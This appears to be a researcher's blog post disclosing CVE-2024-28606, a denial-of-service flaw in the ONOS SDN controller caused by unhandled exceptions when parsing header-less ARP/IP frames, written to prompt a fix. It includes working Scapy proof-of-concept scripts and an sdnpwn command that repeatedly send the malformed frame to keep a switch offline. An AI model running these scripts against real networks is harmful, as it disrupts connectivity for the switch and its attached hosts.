Update: CVE-2024-28606 has been reserved for this vulnerability.
The ONOS Software-Defined Networking (SDN) controller has been around for a while now. I've spent a bit of time using this controller in my own research, and I've found several security issues in it in the past. Recently I decided to take another crack at finding more vulnerabilities - specifically focusing on the packet parsing code and logic.
After some initial probing I managed to identify an issue that leads to Denial of Service. Unfortunately, when I went to report this issue I found that there wasn't really anyone to report it to. In the past, I would report vulnerabilities through the security at onosproject.org email address, but this is no longer monitored by anyone working on the project... and there doesn't seem to be anyone really working on the project anymore either, at least not to the same extent that there was a few years ago. Without anyone to report this to, I can't follow my usual process of responsible disclosure. This post aims to document the vulnerability so that it's known, and someone with more experience working on the ONOS project can hopefully add a patch. While I have some familiarity with the ONOS code-base, I don't have enough experience with it and with Karaf to be able to develop a patch myself.
When ONOS receives a packet-in message from a switch, it parses the layer 2 and layer 3 headers of the enclosed packet. While parsing the Ethernet header, it uses the EtherType to select the function that will parse, or deserialize, the next header (e.g. 0x0806 = ARP.deserializer(), 0x0800 = IP.deserializer()). The function used to deserialize ARP headers is shown in Figure 1.
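To make the dispatch step concrete, here is a minimal Python model of it. This is not ONOS code (ONOS is written in Java); the function names and the lookup table are stand-ins I've made up for illustration, and VLAN tags are ignored.

```python
import struct

ETH_HEADER_LEN = 14  # destination MAC (6) + source MAC (6) + EtherType (2)


def deserialize_arp(payload: bytes) -> str:
    # Placeholder: a real deserializer would validate and parse the ARP header.
    return f"ARP deserializer called with {len(payload)} payload bytes"


def deserialize_ipv4(payload: bytes) -> str:
    # Placeholder for the IPv4 equivalent.
    return f"IPv4 deserializer called with {len(payload)} payload bytes"


# Hypothetical lookup table: EtherType -> function that parses the next header.
DESERIALIZERS = {
    0x0806: deserialize_arp,
    0x0800: deserialize_ipv4,
}


def dispatch(frame: bytes):
    """Read the EtherType and hand the remaining bytes to the matching deserializer."""
    if len(frame) < ETH_HEADER_LEN:
        raise ValueError("frame shorter than an Ethernet header")
    (ethertype,) = struct.unpack("!H", frame[12:14])
    payload = frame[ETH_HEADER_LEN:]
    deserializer = DESERIALIZERS.get(ethertype)
    if deserializer is None:
        return ethertype, None  # unknown EtherType: nothing to parse
    return ethertype, deserializer(payload)


# An Ethernet header that claims ARP but carries nothing after it.
frame = bytes(12) + struct.pack("!H", 0x0806)
print(dispatch(frame))
```

Note that the ARP deserializer is selected purely on the EtherType, even when zero bytes follow the Ethernet header. That is the situation the rest of this post is about.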
As part of the deserialisation process, a function checkInput(), shown in Figure 2, is called to validate the header data that's about to be deserialised.
This function does two things: it checks that there is data to deserialize, and it checks that the header lengths make sense for the given protocol. If either check fails, the function throws a DeserializationException. Now, while checkInput() should, and to an extent does, prevent issues related to packet deserialization, the exception it throws doesn't appear to be properly handled.
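The two checks described above can be sketched in Python as follows. This is a model of the behaviour, not a port of the ONOS function: the signature, the error messages and the length constants are my assumptions (28 bytes is the size of an ARP packet for Ethernet/IPv4, 20 bytes is the minimum IPv4 header), and the threshold ONOS actually uses may differ.

```python
class DeserializationException(Exception):
    """Python stand-in for the exception type thrown by checkInput()."""


ARP_IPV4_LEN = 28         # ARP packet for Ethernet + IPv4 addresses
IPV4_MIN_HEADER_LEN = 20  # IPv4 header without options


def check_input(data, offset, length, required_length):
    """Raise DeserializationException if the buffer cannot hold the header."""
    # Check 1: there must be data to deserialize.
    if data is None:
        raise DeserializationException("no data to deserialize")
    # The (offset, length) window must lie inside the buffer.
    if offset < 0 or length < 0 or offset + length > len(data):
        raise DeserializationException("offset/length outside the buffer")
    # Check 2: the window must be at least as long as the protocol header.
    if length < required_length:
        raise DeserializationException(
            f"need {required_length} bytes, only {length} available"
        )


# Ethernet header with the ARP EtherType and nothing after it.
frame = bytes(12) + b"\x08\x06"
try:
    check_input(frame, 14, len(frame) - 14, ARP_IPV4_LEN)
except DeserializationException as exc:
    print("rejected:", exc)
```

With an empty payload the length check fails for any positive header length, so the exact threshold doesn't matter for the frame used later in this post.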
When an OpenFlow switch is connected to the controller, the DeserializationException thrown by the checkInput() function causes the switch to momentarily disconnect. This can be triggered by sending a packet with either the ARP or IP EtherType, but no matching header. An attacker can send such a packet into the switch they are connected to. This is trivial to do with Scapy:
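    from scapy.all import sendp, Ether

    # Host network interface
    iface = "h1-eth0"

    # Ethernet header with the ARP EtherType and no ARP header behind it
    sendp(Ether(type=0x0806), iface=iface)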
The above code will trigger two exceptions in ONOS, shown in Figures 3 and 4.
The OpenFlow channel's NullPointerException occurs directly after the DeserializationException, which leads me to believe that the DeserializationException thrown by checkInput() is not properly handled.
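The suspicion above can be illustrated with a toy model. None of this is ONOS code: the Channel class, the two handlers and the 28-byte threshold are hypothetical, and the model only shows the general pattern of a parsing error escaping a packet handler and taking the connection down with it, compared with catching it and dropping the one bad packet.

```python
class DeserializationException(Exception):
    """Python stand-in for the exception type thrown by checkInput()."""


def deserialize_arp(payload: bytes) -> dict:
    # Hypothetical length check standing in for checkInput().
    if len(payload) < 28:
        raise DeserializationException("ARP header too short")
    return {"opcode": int.from_bytes(payload[6:8], "big")}


class Channel:
    """Toy stand-in for a controller-to-switch connection."""

    def __init__(self):
        self.connected = True
        self.dropped = 0


def handle_unguarded(channel, payload):
    # Any parsing error propagates to the caller.
    return deserialize_arp(payload)


def handle_guarded(channel, payload):
    # A parsing error only costs the offending packet.
    try:
        return deserialize_arp(payload)
    except DeserializationException:
        channel.dropped += 1
        return None


def run(channel, handler, payloads):
    for payload in payloads:
        try:
            handler(channel, payload)
        except Exception:
            # Model assumption: an error that escapes the handler closes the channel.
            channel.connected = False
            break


for handler in (handle_unguarded, handle_guarded):
    channel = Channel()
    run(channel, handler, [b""])  # empty payload, as in the malformed frame
    print(handler.__name__, channel.connected, channel.dropped)
```

In the guarded variant the malformed packet is counted and discarded while the connection stays up, which is the behaviour I would expect from the controller.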
The NullPointerException causes the switch to disconnect from the controller, and causes the attached hosts to be removed from the ONOS host store (Figure 5). Now, the switch will immediately reconnect, as it is designed to do, but an attacker can cause the switch to become disconnected indefinitely if they continue to send packets that trigger the bug.
The real problem with the switch being forced offline is that new flows cannot be installed in the switch for traffic going to or from hosts attached to it, meaning that new connections to or from these hosts cannot be made. Existing flows in the switch can still be used by the attached hosts. The switch's disconnected state does not affect the attacker's ability to continue the attack. Again, it's trivial for an attacker to carry out a prolonged attack to disconnect the switch indefinitely:
    #!/usr/bin/python3
    from scapy.all import sendp, Ether
    from time import sleep

    # Host network interface
    iface = "h1-eth0"

    while True:
        # Send frame with no payload to trigger bug
        sendp(Ether(type=0x0806), iface=iface)
        # Alt using 0x0800
        #sendp(Ether(type=0x0800), iface=iface)
        sleep(0.2)
Something interesting here is that the attacker can cause different effects by varying the packet rate. For example, the above code sends one packet every 0.2 seconds, which is enough to essentially disconnect the switch entirely (i.e. the switch never gets the opportunity to completely reconnect to the controller). Sending packets at a lower rate, such as one packet every 0.5 seconds, allows some communication between the switch and controller: enough for packet-in messages to be sent, but not enough for flows to be installed, resulting in higher-latency communication with hosts attached to the switch.
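To experiment with different rates without editing the script each time, the interval can be made a parameter. The following is a rough sketch of how I'd do that; the option names and defaults are my own choices for this example, and Scapy is imported inside run() so that the argument parsing can be tried on a machine without Scapy installed.

```python
import argparse
import time


def build_parser():
    parser = argparse.ArgumentParser(
        description="Send header-less frames at a fixed interval"
    )
    parser.add_argument("-i", "--iface", required=True,
                        help="host network interface, e.g. h1-eth0")
    parser.add_argument("-e", "--ethertype", type=lambda v: int(v, 0),
                        default=0x0806, help="EtherType to claim (0x0806 or 0x0800)")
    parser.add_argument("-r", "--interval", type=float, default=0.2,
                        help="seconds to wait between frames")
    return parser


def run(iface, ethertype, interval):
    # Imported lazily: Scapy is only needed when frames are actually sent.
    from scapy.all import Ether, sendp

    while True:
        # Ethernet header with the chosen EtherType and no payload
        sendp(Ether(type=ethertype), iface=iface, verbose=False)
        time.sleep(interval)


def main(argv=None):
    args = build_parser().parse_args(argv)
    run(args.iface, args.ethertype, args.interval)
```

Calling main(["-i", "h1-eth0", "-r", "0.5"]) from a test host would correspond to the slower rate described above. Only run this against a network you control.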
A module to carry out this attack is available as part of the sdnpwn toolkit.
./sdnpwn.py onos-switch-conntection-dos -i INTERFACE_NAME -e 0x0806 -r 0.2
The attacker must be directly connected to the target switch.
This has been tested against the two latest versions of ONOS using the provided Docker containers, specifically onos-latest (3.0.0) and onos-2.7-latest. I have not tested older versions, but I suspect they may be vulnerable to this attack too.
This vulnerability is likely due to an oversight in how the exception handling was implemented for the packet deserialization process. Correcting this is likely just a case of adding a try-catch in the right place. I'm hoping someone with ONOS development experience will come across this and fix it. It's trivial for an attacker to exploit this vulnerability, and successful exploitation can knock an entire network switch and the attached hosts offline for the duration of the attack. Moreover, removal of hosts from the ONOS host store could support attacks like the host location or persona hijacking attacks.
It's a shame that there doesn't seem to be the same level of centralised management for ONOS development that there used to be. The project has only had minor updates for the last while, with most of the latest development seeming to focus on the uONOS project instead. However, even uONOS development appears to be slow. This may be a reflection of the lack of demand for OpenFlow and P4 controllers right now.